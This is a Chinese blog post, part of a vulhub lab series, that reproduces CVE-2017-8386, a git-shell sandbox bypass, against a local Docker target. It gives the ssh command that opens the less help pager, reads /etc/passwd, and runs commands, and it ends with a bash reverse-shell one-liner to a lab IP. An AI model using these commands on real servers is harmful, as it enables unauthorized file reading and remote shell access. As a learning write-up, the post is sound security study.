vulhub漏洞复现80_git

最新推荐文章于 2024-06-16 09:06:56 发布
最新推荐文章于 2024-06-16 09:06:56 发布
阅读量1.5k 收藏
点赞数
文章标签: git 安全 github web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/123052385
版权

前言

GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件

CVE-2017-8386_ GIT-SHELL 沙盒绕过

漏洞原理

GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。

参考链接:

 - https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

 - https://www.leavesongs.com/PENETRATION/git-shell-cve-2017-8386.html

漏洞环境

#192.168.4.10_ubuntu

编译及运行测试环境:

#docker-compose up -d

漏洞利用

为了不和docker母机的ssh端口冲突,容器的ssh端口设置成3322。本目录下生成了一个`id_rsa`,这是ssh的私钥,连接的时候请指定之。

在连接以前,需要先设置私钥的权限为0600:`chmod 0600 id_rsa`,否则连接可能失败。

正常连接其ssh服务`ssh -p 3322 -i id_rsa git@127.0.0.1`,会被git-shell给拦截,返回错误`fatal: unrecognized command ''`,并且连接被关闭。

使用--help技巧,连接目标并进入帮助页面:

```

ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"

```

按`shift`+e,读取任意文件:cat /etc/passwd

回到帮助页面,输入`!+命令`执行命令:

反弹shell

# !/bin/bash -i >& /dev/tcp/192.168.4.29/4444 0>&1

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GIT教程_git入门_git_
09-30
本教程绝对面向初学者,没有接触过版本控制概念的读者也可以轻松入门,不必担心起步难度;
Git权威指南_git_
10-02
Git领域的集大成之作,在广度、深度和实战性上均史无前例国内顶级Git专家亲自撰写,Git官 方维护者等数位专家联袂推荐
GitLab操作指南_git学习指南_git入门_git_gitlab_
10-03
git操作入门指南,适合新手入门学习,经典
git_command.zip_git_git command_git commd_git commond_git命令
09-22
常用git命令,管理代码仓库的一些常用命令。
git-tutor.zip_git_git使用_git教程_版本管理
09-22
代码管理程序git的中文教程,介绍了如何使用git进行高效的代码管理以及代码的版本管理
linux问题解决方案
石阳的博客
08-03 217
1.VMWare workstation启动虚拟机时提示“内部错误”的解决方案 有时候启动vmware中的虚拟机的时候会提示“内部错误”。这个是因为vmware workstation server服务没有启动。我们可以打开windows的服务管理控制台打开这个服务。 右键点击“计算机”,选择“管理”,在左边的“服务和应用程序”中点击“服务”,在右边窗口中找到“VMWare Workstati
git revert 还原命令——反向更改(抵消更改)
weixin_44567318的博客
01-18 1610
git revert 恢复命令——撤销更改语法描述git rebase <since> [<till>]​git rebase --onto <newbase> <since> <till>冲突解决--onto <newbase> 选项——指定新提交起点--continue 选项——继续变基--abort 选项——终止变基--skip 选项——跳过冲突的提交--quit 选项——终止变基 语法 git revert [<选项&
git学习之git revert
choumin的专栏
11-30 426
git revert可以撤销某个提交,它的用法很简单,基本命令是: $ git revert commit-id 当遇到合并提交时会稍微麻烦一点,因为在合并提交中,有两个父节点,在撤销时需要指定父节点,即指定-m参数,该参数表示撤销哪个父节点的提交,1表示第一个父节点,2表示第二个父节点 可以通过git log 或者 git show commit-id看到父节点commit-id的相对位置,例如: $ git show c7a8d32d1f commit c7a8d32d1fcb3cbe6e19
git revert 用法 git版本回退 git回退 git撤回merge分支合并
Beatingworldline的博客
02-18 2715
转载至 git revert 用法 git revert 撤销 某次操作,此次操作之前和之后的commit和history都会保留,并且把这次撤销 作为一次最新的提交 * git revert HEAD 撤销前一次 commit * git revert HEAD^ 撤销前前一次 commit * git revert commit (比如:fa042ce57ebbe5bb9c8db709f719cec2c58ee7ff)撤销指定的版本,撤销也会
git的最简单概括
revengejian的博客
08-06 78
1.git的作用 git的重要作用是版本控制,能回退到提交的那一次,也就是那次版本。每次提交都有一个新的版本。 git的另外重要是:要是a和b在主分支上同时修改一分文件,a先上传,b再上传就会吧a的覆盖,所以要创建分支。 分布式管理 ...
vulhub漏洞复现十八_Gitea
weixin_44193247的博客
01-29 1224
vulhub漏洞复现练习篇
vulhub漏洞复现57_Redis
weixin_44193247的博客
02-11 333
vulhub漏洞复现练习篇
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
Git 之 revert
热门推荐
赶路人儿
01-25 5万+
revert 可以撤销指定的提交内容,撤销后会生成一个新的commit。 1、两种commit: 当讨论 revert 时,需要分两种情况,因为 commit 分为两种:一种是常规的 commit,也就是使用 git commit 提交的 commit;另一种是 merge commit,在使用 git merge 合并两个分支之后,你将会得到一个新的 merge commit merge commit 和普通 commit 的不同之处在于 merge commit 包含两个 parent commi
Vulhub —— MERCY-v2 实战
战神/calmness的博客
12-24 1333
目录 目标 环境 过程 信息收集 nmap扫描 访问8080端口页面 目录遍历 dirb gobuster manager页面 扫描nikto 枚举 用户enum4linux 版本信息 搜索tomcat 漏洞 访问共享 搜索漏洞rips 0.53 文件包含 配置信息tomcat7/tomcat-users.xml 获得用户名和密码 文件上传 获取shell 信息扫描 LinEnum.sh扫描到的用户: linux-exploit-suggester.sh 收集
vue input 限制输入,小数点后保留两位 以及 图片垂直居中显示 和 分享 git 小技巧
呵呵哒!的博客
06-11 1096
error:Your local changes to the following files would be overwritten by merge:_error: your local changes to the following files w-CSDN博客。情况二:当本地的已经乱了,但是远端的master已经合并了你最后一次的代码,此时你可以先把你本地修改的文件先拷贝一份出来,然后让远端的master的代码强行覆盖掉当前的目录内容。
Git】Windows下使用可视化工具Sourcetree
qq_45306739的博客
06-10 374
登录码云Gitee.com,在右上角我的主页–个人设置–安全设置–SSH公钥,将刚才的内容添加进去,输入密码检查后则会添加成功,该计算机本地则与云端仓库建立关联。首先安装Git,然后将本地和远端仓库建立联系,无论是Windows还是Linux下的工具只是将Git命令可视化。之前文章介绍过Linux系统中的Git工具:git cola。跳过Install的登录,直接一路安装,选择安装Git。如果第一次链接出现警告,输入yes验证后即可成功。用记事本打开id_rsa.pub,复制所有内容。
GStreamer编译安装——使用Meson从源代码编译
FREEDOM_X的专栏
06-12 1050
对于希望处理GStreamer代码本身和/或修改它的开发人员,或者希望快速尝试尚未在GStreamer正式版本中的功能的应用程序开发人员,这是推荐的设置。在mono存储库合并不同的GStreamer模块之前 单独的git存储库,并且有一个单独的meta-builder项目 调用。命令,您可以将构建目录指定为 参数。如果您想针对即将到来的开发或稳定的分支进行构建或开发 您应该使用包含mono的GStreamer模块的。, 可用于构建特定的GStreamer版本或构建未发布的版本 GStreamer代码。
hugo-magic主题使用教程(一)
最新发布
u010066597的博客
06-16 238
打开浏览器,输入地址: http://localhost:1313/拷贝hugo-magic主题核心文件到根目录 quickstart。在桌面右键打开Git bash运行以下命令。
gitlab_shell_git_timeout
06-02
`gitlab_shell_git_timeout`是GitLab Shell的一个配置选项,用于设置在执行Git操作时的超时时间。默认情况下,此选项设置为1800秒(30分钟),如果Git操作在此时间内没有完成,GitLab Shell将会终止该操作并返回错误...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值